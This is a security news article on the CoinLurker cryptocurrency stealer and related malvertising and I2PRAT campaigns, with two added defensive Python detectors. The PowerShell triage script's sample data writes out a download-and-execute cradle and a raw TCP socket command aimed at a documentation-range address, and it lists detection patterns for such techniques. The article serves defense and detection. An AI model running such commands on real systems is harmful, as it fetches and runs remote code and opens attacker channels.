WebView2 Exploited: CoinLurker Malware Targets Cryptocurrency Wallets


Attackers are targeting cryptocurrency users with fake software update notifications that deploy a stealer known as CoinLurker. Written in Go and built with layered obfuscation and anti-analysis techniques, CoinLurker is a serious threat to anyone holding cryptocurrency on a Windows desktop.

Malware Delivery Tactics

Attackers use multiple deceptive entry points to trick users into downloading CoinLurker. These include:

  • Compromised Websites: Fake update prompts on hacked WordPress sites.

  • Malvertising Redirects: Ads leading to malicious sites.

  • Phishing Emails: Links to counterfeit update pages.

  • Social Engineering: Fake CAPTCHA verifications and download links shared via messaging apps.

Regardless of the entry method, the installer abuses Microsoft Edge WebView2 as a host for the payload. No vulnerability in WebView2 is involved; the component is simply used as a runtime that helps the payload execute while evading security detection.

Abusing WebView2 for Evasion

WebView2 depends on a separately installed runtime and on user interaction, both of which complicate sandbox analysis: an analysis environment without the runtime, or one that never clicks through the prompt, never sees the payload run. “Sandboxes often lack WebView2 or fail to replicate user actions, allowing the malware to evade automated detection,” explained Morphisec researcher Nadav Lorber.

Advanced Obfuscation with EtherHiding

A notable technique used in these campaigns is EtherHiding, in which scripts injected into compromised sites read their next-stage configuration from a blockchain smart contract (Web3 infrastructure). Because the contract, not the compromised site, holds the payload location, attackers can change it at will and defenders cannot take it down like a conventional server. That stage fetches the final payload from a Bitbucket repository, where it masquerades as legitimate software (e.g., “UpdateMe.exe,” “SecurityPatch.exe”).

To appear legitimate, these executables are signed with stolen Extended Validation (EV) certificates, so a valid signature on its own is no evidence that the file is safe. A multi-layered injector then injects the payload into the Microsoft Edge (“msedge.exe”) process, so its network and file activity is attributed to a trusted browser and slips past typical security filters.

Technical Obfuscation Tactics

CoinLurker employs several obfuscation strategies to avoid detection:

  • In-Memory Decoding: The payload is decoded only in memory at runtime, so no decoded copy is ever written to disk.

  • Conditional Checks: Conditional logic obscures the real execution path and can steer an analysis environment away from the malicious branch.

  • Redundant Resource Assignments: Superfluous operations pad the code path and make analysis more time-consuming.

  • Iterative Memory Manipulation: Memory is rewritten repeatedly at runtime, so the final code is never present as a static artifact that signature-based tools can match.

These techniques let the malware blend into legitimate system processes and evade detection mechanisms that rely on static signatures or coarse behavioral rules.

Data Harvesting Targets

Once operational, CoinLurker establishes a socket-based connection to a remote server and begins harvesting sensitive data, particularly from:

  • Cryptocurrency Wallets: Bitcoin, Ethereum, Ledger Live, and Exodus.

  • Communication Platforms: Telegram and Discord.

  • File Transfer Tools: FileZilla.
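The harvesting targets above suggest a hunting rule: a process that is not the owning application reading a wallet, messenger or FTP client's credential store. The following is an added example, not Morphisec's or the article's code. The file paths are assumptions based on the default install locations of the listed applications, and the event lines are constructed in a simplified Sysmon file-event style; the example flags the exact pattern the article describes, a browser process (msedge.exe) touching a wallet seed file.

```python
"""Hunt for non-owner processes touching wallet / messenger / FTP credential stores.

Added example; paths and owning process names are assumptions about default
installs, not indicators taken from the article.
"""
import fnmatch
import re

# (application, processes that legitimately own the store, path patterns)
TARGETS = [
    ("Exodus", {"exodus.exe"},
     ["*\\AppData\\Roaming\\Exodus\\exodus.wallet\\*"]),
    ("Ledger Live", {"ledger live.exe"},
     ["*\\AppData\\Roaming\\Ledger Live\\*"]),
    ("Bitcoin Core", {"bitcoin-qt.exe", "bitcoind.exe"},
     ["*\\AppData\\Roaming\\Bitcoin\\wallet.dat",
      "*\\AppData\\Roaming\\Bitcoin\\wallets\\*"]),
    ("Ethereum (geth keystore)", {"geth.exe"},
     ["*\\AppData\\Roaming\\Ethereum\\keystore\\*"]),
    ("Telegram", {"telegram.exe"},
     ["*\\AppData\\Roaming\\Telegram Desktop\\tdata\\*"]),
    ("Discord", {"discord.exe"},
     ["*\\AppData\\Roaming\\discord\\Local Storage\\leveldb\\*"]),
    ("FileZilla", {"filezilla.exe"},
     ["*\\AppData\\Roaming\\FileZilla\\sitemanager.xml",
      "*\\AppData\\Roaming\\FileZilla\\recentservers.xml"]),
]

# Simplified Sysmon-style file event: "Image: <process> TargetFilename: <file>"
EVENT_RE = re.compile(r"Image:\s*(?P<image>.+?)\s+TargetFilename:\s*(?P<target>.+?)\s*$")


def classify(image: str, target: str):
    """Return (process, application, path) when a non-owner touches a store, else None."""
    proc = image.rsplit("\\", 1)[-1].lower()
    path = target.lower()
    for app, owners, patterns in TARGETS:
        if any(fnmatch.fnmatchcase(path, p.lower()) for p in patterns):
            # The owning application reading its own store is normal.
            return None if proc in owners else (proc, app, target)
    return None


def hunt(events: str):
    """Run classify() over every parsable event line and collect the hits."""
    hits = []
    for line in events.splitlines():
        m = EVENT_RE.search(line)
        if m is None:
            continue
        hit = classify(m["image"], m["target"])
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = """\
Image: C:\\Users\\alice\\AppData\\Local\\exodus\\app-24.1.1\\Exodus.exe TargetFilename: C:\\Users\\alice\\AppData\\Roaming\\Exodus\\exodus.wallet\\seed.seco
Image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe TargetFilename: C:\\Users\\alice\\AppData\\Roaming\\Exodus\\exodus.wallet\\seed.seco
Image: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe TargetFilename: C:\\Users\\alice\\AppData\\Roaming\\Telegram Desktop\\tdata\\key_datas
Image: C:\\Users\\alice\\Downloads\\UpdateMe.exe TargetFilename: C:\\Users\\alice\\AppData\\Roaming\\FileZilla\\sitemanager.xml
Image: C:\\Users\\alice\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe TargetFilename: C:\\Users\\alice\\AppData\\Roaming\\Telegram Desktop\\tdata\\key_datas
Image: C:\\Windows\\explorer.exe TargetFilename: C:\\Users\\alice\\Documents\\notes.txt
"""

if __name__ == "__main__":
    for proc, app, path in hunt(SAMPLE_EVENTS):
        print(f"ALERT {proc} read {app} store: {path}")
```

Only the three non-owner accesses are reported: the two reads by msedge.exe (the process CoinLurker injects into) and the one by the fake updater. Browser helper processes and backup agents will need allowlisting in a real deployment, but the signal of a browser reading a wallet seed file is worth an alert on its own.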

“Its ability to target both mainstream and lesser-known wallets highlights its adaptability and dangerous potential within the cryptocurrency ecosystem,” Lorber added.


Emerging Threats and Related Campaigns

CoinLurker’s rise coincides with other related malware operations. A notable example involves a single threat actor conducting up to 10 malvertising campaigns aimed at graphic design professionals using Google Search ads. The campaigns lure users with downloads of popular design tools like FreeCAD, Rhinoceros 3D, and Planner 5D.

Silent Push, a cybersecurity firm, identified two dedicated IP addresses—185.11.61[.]243 and 185.147.124[.]110—linked to these campaigns. “Domains are launched day after day, week after week, serving malicious downloads through Google Search ads,” Silent Push reported.

Another concerning development is the emergence of a malware family dubbed I2PRAT, also tracked by Cofense as I2Parcae RAT. I2PRAT routes its encrypted command-and-control (C2) traffic over the I2P anonymizing peer-to-peer network, which hides the C2 server's location and complicates efforts to track its activities.

Phishing Attack Chain

The I2PRAT infection chain starts with a phishing email containing a link. Clicking the link directs victims to a fake CAPTCHA verification page that employs the ClickFix technique: the page tricks users into running, by hand, a Base64-encoded PowerShell command that downloads the RAT from the C2 server over a TCP socket and launches it. Because the victim types the command themselves, no browser exploit is needed and the launch appears as a user-initiated process.
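The ClickFix step leaves a reliable trace in process-creation telemetry: a PowerShell launch with an -EncodedCommand argument, spawned from the user's shell. The following is an added example of how a detection pipeline can decode that argument and triage its contents; it is not the article's, Cofense's or Morphisec's code. The log lines are constructed in a simplified Sysmon process-creation style, the sample scripts use a TEST-NET address, and the indicator list is a starting point rather than a complete signature.

```python
"""Decode and triage -EncodedCommand PowerShell launches (ClickFix-style).

Added example; the log format and indicator regexes are assumptions, and the
sample command lines are constructed, not captured from a real incident.
"""
import base64
import re

# PowerShell accepts -e/-ec/-enc/-EncodedCommand followed by base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?:-|/)(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
PARENT_RE = re.compile(r"ParentImage:\s*(?P<parent>.+?)\s+CommandLine:", re.I)

# Indicator classes searched in the decoded script plus the outer command line.
INDICATORS = [
    ("download", re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I)),
    ("execute", re.compile(r"invoke-expression|\biex\b|start-process|\[reflection\.assembly\]", re.I)),
    ("socket", re.compile(r"net\.sockets\.tcpclient|getstream\(\)", re.I)),
    ("hidden", re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|executionpolicy\s+bypass", re.I)),
]


def encode_for_powershell(script: str) -> str:
    """Produce the base64 form PowerShell expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if the command line has no encoded argument."""
    m = ENC_RE.search(cmdline)
    if m is None:
        return None
    blob = m.group(1)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16-le", errors="replace")


def triage(line: str):
    """Decode one process-creation line and classify it; None if not an encoded launch."""
    script = decode_encoded_command(line)
    if script is None:
        return None
    # Drop the base64 blob before matching so random alphanumerics cannot hit a regex.
    outer = ENC_RE.sub("", line)
    hits = [name for name, rx in INDICATORS if rx.search(outer + "\n" + script)]
    pm = PARENT_RE.search(line)
    parent = pm["parent"].rsplit("\\", 1)[-1].lower() if pm else ""
    if "socket" in hits or {"download", "execute"} <= set(hits):
        verdict = "suspicious"          # download-and-run cradle or raw C2 socket
    elif hits and parent == "explorer.exe":
        verdict = "suspicious"          # typed into the Run dialog with evasion flags
    elif hits:
        verdict = "review"
    else:
        verdict = "none"
    return {"parent": parent, "script": script, "indicators": hits, "verdict": verdict}


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
CRADLE = "$c=New-Object Net.WebClient; IEX $c.DownloadString('http://203.0.113.10/i.txt')"
SOCKET = "$t=New-Object Net.Sockets.TcpClient('203.0.113.10',443);$s=$t.GetStream()"
ADMIN = "Get-Service | Where-Object Status -eq 'Running'"
SAMPLE_LOG = "\n".join([
    "ParentImage: C:\\Windows\\explorer.exe CommandLine: powershell.exe -nop -w hidden -enc " + encode_for_powershell(CRADLE),
    "ParentImage: C:\\Windows\\explorer.exe CommandLine: powershell.exe -ep bypass -enc " + encode_for_powershell(SOCKET),
    "ParentImage: C:\\Windows\\System32\\svchost.exe CommandLine: powershell.exe -EncodedCommand " + encode_for_powershell(ADMIN),
    "ParentImage: C:\\Windows\\explorer.exe CommandLine: notepad.exe C:\\Users\\alice\\notes.txt",
])

if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        result = triage(line)
        if result:
            print(result["verdict"], result["indicators"], result["script"])
```

Decoding rather than alerting on -EncodedCommand alone keeps the rule usable: the encoded administrative query scores as "none", while both ClickFix-style launches are flagged on the content of the script and the explorer.exe parent, which is what a command pasted into the Run dialog looks like.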

Actionable Enhancements for Better Protection

  1. User Awareness Training: Train users regularly on phishing, fake update prompts, malvertising, and in particular on never pasting a command from a web page into the Run dialog or a terminal.

  2. Web Security Filters: Deploy web filtering that blocks known malvertising and fake-update domains and treats newly registered domains with suspicion, since these campaigns rotate domains daily.

  3. Certificate Validation: Treat a valid Authenticode signature, even an EV one, as necessary but not sufficient. Check the signer's identity against the expected publisher and flag signed binaries that arrive from unusual channels such as public code-hosting repositories.

  4. Behavioral Analysis: Use endpoint detection and response (EDR) tools that watch for process injection into browsers, encoded PowerShell launches, and non-owner access to wallet and messenger data stores.

  5. Secure Development Practices: Keep WordPress and other CMS installations and plugins patched and protected against script injection, since compromised sites are the first link in the chain.

By understanding and addressing the evolving tactics used by CoinLurker and similar threats, organizations can better defend against these advanced malware campaigns.
